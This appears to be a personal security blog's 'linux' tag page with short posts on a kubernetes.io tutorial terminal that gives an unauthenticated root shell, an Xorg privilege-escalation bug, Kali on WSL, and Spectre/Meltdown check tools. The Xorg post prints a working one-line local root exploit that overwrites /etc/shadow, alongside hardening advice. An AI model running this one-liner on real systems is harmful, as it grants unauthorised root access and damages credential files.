Tag: linux
kubernetes.io web terminal root shell
by zitstif on Jan.01, 2020, under Posts
Recently, I’ve been reading up on containers and kubernetes. I have just discovered this. It just seems like it could be easily abused:
No authentication necessary. You simply click on Launch Terminal and you’ll get a root shell with full internet access.
https://kubernetes.io/docs/tutorials/hello-minikube/
(This is a frame from https://www.katacoda.com/ )
eXploit X : “Give Me Root” – Computerphile
by zitstif on Nov.11, 2018, under Code, Exploits, Posts, Videos
Example of exploit: cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su
This is just another reason why if you run a headless server, to not have Xorg or a GUI installed. Reduce the attack surface as much as you can.
Kali Linux for WSL now available on Windows Store
by zitstif on Mar.06, 2018, under Posts
This is pretty neat:
However, I have a couple concerns. First, how useful will it be? Currently on a Windows 10 system, I have WSL setup and nmap is essentially useless:
tester@Win10virtual:~$ sudo nmap -sP -n -T4 192.168.1.254
Starting Nmap 7.01 ( https://nmap.org ) at 2018-03-06 14:10 STD
dnet: Failed to open device eth0
QUITTING!
There is discussion about this issue here:
https://github.com/Microsoft/WSL/issues/1349
There is discussion of other network tools having socket related issues.
Second, how will AV handle tools like metasploit, powersploit, social engineering toolkit and the like that may set off AV engines?
I honestly think WSL is awesome but at this point I would recommend running whatever Linux distro of your desire on VirtualBox or the like.
“Moving efficiently in the CLI” – CLÉMENT CHASTAGNOL
by zitstif on Jan.26, 2018, under Posts
Leave a Comment :bash, CLI, command, command line, CUI, linux, shell more...nixCraft – How to check Linux for Spectre and Meltdown vulnerability
by zitstif on Jan.09, 2018, under Posts
Great article:
https://www.cyberciti.biz/faq/check-linux-server-for-spectre-meltdown-vulnerability/
Intel has also released a microcode update:
https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File
How does it affect performance on Windows systems? According to Microsoft:
#Update 1/17/2018 Tool for checking on Windows systems:
http://www.guru3d.com/news-story/download-inspectre-meltdown-and-spectre-check-tool.html
sha1sum ‘[Guru3D]-InSpectre.exe’
6a3f1382f3c9c1fd53bf4c3708e3a449cbcb136f [Guru3D]-InSpectre.exe